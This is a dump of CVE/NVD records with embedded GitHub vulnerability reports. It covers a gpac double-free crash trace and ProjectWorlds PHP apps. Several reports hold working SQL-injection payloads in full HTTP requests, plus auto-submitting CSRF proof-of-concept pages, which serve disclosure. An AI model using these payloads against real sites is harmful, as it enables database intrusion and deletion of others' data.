box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 853069 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 853069 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 LASeR Scene Parsing [LASeR] samerect coded in bitstream but no rect defined ! double free or corruption (out) [1] 3786815 abort /root/fuck_bin/gpac/test/lib/MP4Box -bt ``` **gdb** ``` Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x0 RBX 0x7ffff72bf040 ◂— 0x7ffff72bf040 RCX 0x7ffff758218b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108] RDX 0x0 RDI 0x2 RSI 0x7fffffff6a30 ◂— 0x0 R8 0x0 R9 0x7fffffff6a30 ◂— 0x0 R10 0x8 R11 0x246 R12 0x7fffffff6ca0 ◂— 0x0 R13 0x10 R14 0x7ffff7ffb000 ◂— 0x62756f6400001000 R15 0x1 RBP 0x7fffffff6d80 —▸ 0x7ffff7727b80 (main_arena) ◂— 0x0 RSP 0x7fffffff6a30 ◂— 0x0 RIP 0x7ffff758218b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x7ffff758218b <raise+203> mov rax, qword ptr [rsp + 0x108] 0x7ffff7582193 <raise+211> xor rax, qword ptr fs:[0x28] 0x7ffff758219c <raise+220> jne raise+260 <raise+260> ↓ 0x7ffff75821c4 <raise+260> call __stack_chk_fail <__stack_chk_fail> 0x7ffff75821c9 nop dword ptr [rax] 0x7ffff75821d0 <killpg> endbr64 0x7ffff75821d4 <killpg+4> test edi, edi 0x7ffff75821d6 <killpg+6> js killpg+16 <killpg+16> 0x7ffff75821d8 <killpg+8> neg edi 0x7ffff75821da <killpg+10> jmp kill <kill> 0x7ffff75821df <killpg+15> nop ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsi r9 rsp 0x7fffffff6a30 ◂— 0x0 01:0008│ 0x7fffffff6a38 —▸ 0x7ffff7fe7c2e ◂— mov r11, rax 02:0010│ 0x7fffffff6a40 ◂— 0x2 03:0018│ 0x7fffffff6a48 —▸ 0x5555555e06e0 —▸ 0x5555555e0698 ◂— 0x0 04:0020│ 0x7fffffff6a50 ◂— 0x18 05:0028│ 0x7fffffff6a58 —▸ 0x5555555e06f0 —▸ 0x5555555e2758 ◂— 0x0 06:0030│ 0x7fffffff6a60 —▸ 0x5555555e37b0 —▸ 0x5555555e37d0 ◂— 0x8000000300000426 07:0038│ 0x7fffffff6a68 —▸ 0x5555555e06f0 —▸ 0x5555555e2758 ◂— 0x0 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff758218b raise+203 f 1 0x7ffff7561859 abort+299 f 2 0x7ffff75cc3ee __libc_message+670 f 3 0x7ffff75d447c f 4 0x7ffff75d6120 _int_free+1888 f 5 0x7ffff7b51c85 lsr_read_id+629 f 6 0x7ffff7b5e91b lsr_read_path+283 f 7 0x7ffff7b61822 lsr_read_update_content_model+770 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff7561859 in __GI_abort () at abort.c:79 #2 0x00007ffff75cc3ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff76f6285 "%s\n") at ../sysdeps/posix/libc_fatal.c:155 #3 0x00007ffff75d447c in malloc_printerr (str=str@entry=0x7ffff76f8670 "double free or corruption (out)") at malloc.c:5347 #4 0x00007ffff75d6120 in _int_free (av=0x7ffff7727b80 <main_arena>, p=0x5555555e06e0, have_lock=<optimized out>) at malloc.c:4314 #5 0x00007ffff7b51c85 in lsr_read_id () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #6 0x00007ffff7b5e91b in lsr_read_path () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #7 0x00007ffff7b61822 in lsr_read_update_content_model () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #8 0x00007ffff7b59fc3 in lsr_read_command_list () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #9 0x00007ffff7b5ab74 in lsr_decode_laser_unit () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #10 0x00007ffff7b6239d in gf_laser_decode_command_list () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #11 0x00007ffff7aa3061 in gf_sm_load_run_isom () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #12 0x00005555555844a8 in dump_isom_scene () #13 0x000055555557b42c in mp4boxMain () #14 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe1e8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1d8) at ../csu/libc-start.c:308 #15 0x000055555556c45e in _start () ``` ``` Breakpoint 4, __GI___libc_free (mem=0x5555555e06f0) at malloc.c:3087 3087 in malloc.c LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x5555555e37b0 —▸ 0x5555555e37d0 ◂— 0x8000000300000426 RBX 0x5555555dc120 —▸ 0x5555555d1a00 ◂— 0x0 *RCX 0x27 *RDX 0xa *RDI 0x5555555e06f0 —▸ 0x5555555e2758 ◂— 0x0 *RSI 0xfffffff7 R8 0x1999999999999999 R9 0x0 R10 0x7ffff76daac0 (_nl_C_LC_CTYPE_toupper+512) ◂— 0x100000000 R11 0x7ffff76db3c0 (_nl_C_LC_CTYPE_class+256) ◂— 0x2000200020002 R12 0x1 *R13 0x3 R14 0x0 *R15 0x7fffffff6a50 ◂— 0x18 RBP 0x0 RSP 0x7fffffff6e18 —▸ 0x7ffff7b51c85 (lsr_read_id+629) ◂— mov qword ptr [r15 + 8], 0 RIP 0x7ffff75d9850 (free) ◂— endbr64 ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x7ffff75d9850 <free> endbr64 0x7ffff75d9854 <free+4> sub rsp, 0x18 0x7ffff75d9858 <free+8> mov rax, qword ptr [rip + 0x14d699] 0x7ffff75d985f <free+15> mov rax, qword ptr [rax] 0x7ffff75d9862 <free+18> test rax, rax 0x7ffff75d9865 <free+21> jne free+152 <free+152> 0x7ffff75d986b <free+27> test rdi, rdi 0x7ffff75d986e <free+30> je free+144 <free+144> 0x7ffff75d9870 <free+32> mov rax, qword ptr [rdi - 8] 0x7ffff75d9874 <free+36> lea rsi, [rdi - 0x10] 0x7ffff75d9878 <free+40> test al, 2 ──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────00:0000│ rsp 0x7fffffff6e18 —▸ 0x7ffff7b51c85 (lsr_read_id+629) ◂— mov qword ptr [r15 + 8], 0 01:0008│ 0x7fffffff6e20 —▸ 0x5555555e37b0 —▸ 0x5555555e37d0 ◂— 0x8000000300000426 02:0010│ 0x7fffffff6e28 ◂— 0x426 03:0018│ 0x7fffffff6e30 —▸ 0x5555555e37b0 —▸ 0x5555555e37d0 ◂— 0x8000000300000426 04:0020│ 0x7fffffff6e38 —▸ 0x7ffff784a61e (gf_node_setup+30) ◂— mov qword ptr [rbx], rax 05:0028│ 0x7fffffff6e40 ◂— 0x426 ... ↓ 2 skipped ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff75d9850 free f 1 0x7ffff7b51c85 lsr_read_id+629 f 2 0x7ffff7b5e91b lsr_read_path+283 f 3 0x7ffff7b61822 lsr_read_update_content_model+770 f 4 0x7ffff7b59fc3 lsr_read_command_list+6819 f 5 0x7ffff7b5ab74 lsr_decode_laser_unit+708 f 6 0x7ffff7b6239d gf_laser_decode_command_list+333 f 7 0x7ffff7aa3061 gf_sm_load_run_isom+1505 ──────────────────────────────────────────────────────────────────────────────────────────────────────pwndbg> bin tcachebins 0x20 [ 1]: 0x5555555e1690 ◂— 0x0 0x50 [ 1]: 0x5555555e2ad0 ◂— 0x0 0xb0 [ 1]: 0x5555555dc540 ◂— 0x0 0xc0 [ 4]: 0x5555555d1d20 —▸ 0x5555555d2060 —▸ 0x5555555d2270 —▸ 0x5555555dc3c0 ◂— 0x0 0x140 [ 1]: 0x5555555d1b80 ◂— 0x0 0x1c0 [ 1]: 0x5555555d17a0 ◂— 0x0 0x210 [ 1]: 0x5555555dd8b0 ◂— 0x0 0x410 [ 1]: 0x5555555cee30 ◂— 0x0 fastbins 0x20: 0x0 0x30: 0x0 0x40: 0x0 0x50: 0x0 0x60: 0x0 0x70: 0x0 0x80: 0x0 unsortedbin all: 0x0 smallbins empty largebins empty pwndbg> c Continuing. double free or corruption (out) pwndbg> x/10gx 0x5555555e06f0-0x20 0x5555555e06d0: 0x0000000000000000 0x0000000000000061 0x5555555e06e0: 0x00005555555e0698 0x00007fffffff6a50 0x5555555e06f0: 0x00005555555e2758 0x00005555555e2758 0x5555555e0700: 0x0000000000000000 0x0000000000000000 0x5555555e0710: 0x0000000000000000 0x0000000000000000 ```
Invalid free in gf_svg_node_del()
https://api.github.com/repos/gpac/gpac/issues/1986/comments
1
2021-12-14T02:57:15Z
2021-12-14T10:38:08Z
https://github.com/gpac/gpac/issues/1986
1,079,248,712
1,986
2,900
CVE-2021-43155
2021-12-22T18:15:07.557
Projectsworlds Online Book Store PHP v1.0 is vulnerable to SQL injection via the "bookisbn" parameter in cart.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/18" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/18" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:projectworlds:online_book_store_project_in_php:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "D4ABC369-3132-4E06-A9CA-C765C8497088", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/18
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "projectworldsofficial", "online-book-store-project-in-php" ]
# Author KhanhCM (@khanhchauminh) ## Version: 1.0 # Steps to reproduce 1. Go to any book detail page by clicking on that book's image. 2. Click on "**Purchase / Add to cart**" button. 3. Intercept the request and insert the payload in the value of the `bookisbn` parameter. Example payload: ``` ' or updatexml(1,concat(0x7e,(version())),0) -- a ``` # Proof-of-concept ``` POST /cart.php HTTP/1.1 Host: 127.0.0.1:8888 Content-Length: 137 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.89.145:8888 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://127.0.0.1:8888/book.php?bookisbn=978-1-49192-706-9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=2vmimaak7ho1ccnj624a5js0lq Connection: close bookisbn=978-1-49192-706-9%27%20or%20updatexml%281%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29%20--%20a&cart=Purchase+%2F+Add+to+cart ``` # Response in Burpsuite ![image](https://user-images.githubusercontent.com/48460056/139533129-7f51c4b6-7f26-42ef-b6a6-8b3e87288996.png) # Source code review ## [cart.php](https://github.com/projectworldsofficial/online-book-store-project-in-php/blob/master/cart.php#L18) ![image](https://user-images.githubusercontent.com/48460056/140685540-6bc5dd66-c82e-4a5c-84b3-7e520a6cc238.png) ## [functions/cart_functions.php](https://github.com/projectworldsofficial/online-book-store-project-in-php/blob/master/functions/cart_functions.php#L12) ![image](https://user-images.githubusercontent.com/48460056/140685638-a94fd21c-63cd-4998-b497-d6691e4bbf7e.png) ## [functions/database_functions.php](https://github.com/projectworldsofficial/online-book-store-project-in-php/blob/5e535183d825a5778684c96c851fce115a736cc0/functions/database_functions.php#L58) ![image](https://user-images.githubusercontent.com/48460056/140685669-6c6e2a6c-436c-4f64-a7f0-90ec3dc80ddb.png) # Remediation Validate input of `bookisbn` parameter in `cart.php`.
SQL Injection vulnerability via the "bookisbn" parameter in cart.php
https://api.github.com/repos/projectworldsofficial/online-book-store-project-in-php/issues/18/comments
0
2021-10-30T12:45:40Z
2021-11-08T04:45:57Z
https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/18
1,040,138,985
18
2,901
CVE-2021-43156
2021-12-22T18:15:07.600
In ProjectWorlds Online Book Store PHP 1.0 a CSRF vulnerability in admin_delete.php allows a remote attacker to delete any book.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/19" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/19" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:projectworlds:online_book_store_project_in_php:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "D4ABC369-3132-4E06-A9CA-C765C8497088", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/19
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "projectworldsofficial", "online-book-store-project-in-php" ]
# Author KhanhCM (@khanhchauminh) ## Version: 1.0 # Details The GET request for deleting a book with `ISBN=12345` looks like this: ``` http://127.0.0.1:8888/admin_delete.php?bookisbn=12345 ``` Changing the value of the `bookisbn` parameter under admin privilege will delete the book with that ISBN. A remote attacker can embed the request into an innocent-looking hyperlink: ``` <a href="http://127.0.0.1:8888/admin_delete.php?bookisbn=12345">View</a> ``` # Step to reproduce 1. First, create a malicious HTML page then host a website containing that page. ### PoC: ``` <html> <head> <title>CSRF PoC</title> </head> <body> <p>CSRF PoC</p> <a id='link' href="http://127.0.0.1:8888/admin_delete.php?bookisbn=12345">View</a> <script> document.getElementById('link').click(); </script> </body> </html> ``` 2. Entice the admin to click on the link to the malicious site. When the admin browses to that site, the link would be automatically clicked via JavaScript and the book will be deleted. # Response in Burpsuite ![image](https://user-images.githubusercontent.com/48460056/139569472-97b2722a-9400-41b4-92fa-a05baed014c4.png) ![image](https://user-images.githubusercontent.com/48460056/139569481-f387a38c-8e28-439b-8607-b16f3332ea13.png) # Source code review ## [admin_delete.php](https://github.com/projectworldsofficial/online-book-store-project-in-php/blob/5e535183d825a5778684c96c851fce115a736cc0/admin_delete.php#L2) ![image](https://user-images.githubusercontent.com/48460056/140685852-5f2252c3-69b6-4b46-9339-21e06ed04c7a.png) # Remediation Implement an Anti-CSRF Token.
CSRF vulnerability in admin_delete.php allows a remote attacker to delete any book
https://api.github.com/repos/projectworldsofficial/online-book-store-project-in-php/issues/19/comments
0
2021-10-31T05:35:12Z
2021-11-08T04:50:51Z
https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/19
1,040,381,331
19
2,902
CVE-2021-43157
2021-12-22T18:15:07.643
Projectsworlds Online Shopping System PHP 1.0 is vulnerable to SQL injection via the id parameter in cart_remove.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/1" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://projectworlds.in/free-projects/php-projects/free-download-online-shopping-system/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://projectworlds.in/free-projects/php-projects/free-download-online-shopping-system/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:projectworlds:online_shopping_system_in_php:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "34EA4FD7-C8A7-4D17-880A-2D7EFBD0BEED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "projectworldsofficial", "online-shopping-webvsite-in-php" ]
# Author KhanhCM (@khanhchauminh) ## Version: 1.0 ### No login is required * Example payload: ``` ' or updatexml(1,concat(0x7e,(version())),0) -- a ``` # Proof-of-concept ``` http://127.0.0.1:8888/cart_remove.php?id=5%27%20or%20updatexml%281%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29%20--%20a ``` ## HTTP request ``` GET /cart_remove.php?id=5%27%20or%20updatexml%281%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29%20--%20a HTTP/1.1 Host: 127.0.0.1:8888 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://127.0.0.1:8888/cart.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close ``` # Response in Burpsuite ![image](https://user-images.githubusercontent.com/48460056/139582804-7572a9b2-5e2c-43ae-a465-4921e7fe5068.png) # Source code review ## [cart_remove.php](https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/blob/master/cart_remove.php#L6) ![image](https://user-images.githubusercontent.com/48460056/140705118-65f5863f-8065-4ecc-99e8-b99a1bc4b37c.png) # Remediation Validate input of `id` parameter in `cart_remove.php`.
SQL Injection vulnerability via the "id" parameter in cart_remove.php
https://api.github.com/repos/projectworldsofficial/online-shopping-webvsite-in-php/issues/1/comments
0
2021-10-31T12:18:55Z
2021-11-08T08:03:09Z
https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/1
1,040,455,152
1
2,903
CVE-2021-43158
2021-12-22T18:15:07.687
In ProjectWorlds Online Shopping System PHP 1.0, a CSRF vulnerability in cart_remove.php allows a remote attacker to remove any product in the customer's cart.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/2" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://projectworlds.in/free-projects/php-projects/free-download-online-shopping-system/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://projectworlds.in/free-projects/php-projects/free-download-online-shopping-system/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:projectworlds:online_shopping_system_in_php:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "34EA4FD7-C8A7-4D17-880A-2D7EFBD0BEED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "projectworldsofficial", "online-shopping-webvsite-in-php" ]
# Author KhanhCM (@khanhchauminh) ## Version: 1.0 # Details The GET request for removing a product with `id=1` looks like this: ``` http://127.0.0.1:8888/cart_remove.php?id=1 ``` Changing the value of the `id` parameter in the customer session will remove the product with that ID. A remote attacker can embed the request into an innocent-looking hyperlink: ``` <a href="http://127.0.0.1:8888/cart_remove.php?id=1">View</a> ``` # Step to reproduce 1. First, create a malicious HTML page then host a website containing that page. ### PoC: ``` <html> <head> <title>CSRF PoC</title> </head> <body> <p>CSRF PoC</p> <a id='link' href="http://127.0.0.1:8888/cart_remove.php?id=1">View</a> <script> document.getElementById('link').click(); </script> </body> </html> ``` 2. Entice the customer to click on the link to the malicious site. When the customer browses to that site, the link would be automatically clicked via JavaScript and the product will be removed. # Response in Burpsuite ![image](https://user-images.githubusercontent.com/48460056/139583316-95aa1edd-bc77-46d4-82f2-d1073214406e.png) ![image](https://user-images.githubusercontent.com/48460056/139583328-20c9f436-2ca6-4cde-be99-70aa415de33c.png) # Source code review ## cart_remove.php ![image](https://user-images.githubusercontent.com/48460056/139582921-f25f130c-625b-4e9e-b47f-606c0366d280.png) # Remediation Implement an Anti-CSRF Token.
CSRF vulnerability in cart_remove.php allows a remote attacker to remove any product in the customer's cart
https://api.github.com/repos/projectworldsofficial/online-shopping-webvsite-in-php/issues/2/comments
0
2021-10-31T12:31:11Z
2021-10-31T13:36:03Z
https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/2
1,040,457,812
2
2,904
CVE-2021-43628
2021-12-22T18:15:07.730
Projectworlds Hospital Management System v1.0 is vulnerable to SQL injection via the email parameter in hms-staff.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/2" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://projectworlds.in/free-projects/php-projects/hospital-management-system-in-php/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://projectworlds.in/free-projects/php-projects/hospital-management-system-in-php/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:projectworlds:hospital_management_system_in_php:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "82B97C8D-6AD6-4944-B57B-639B6E56B703", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "projectworldsofficial", "hospital-management-system-in-php" ]
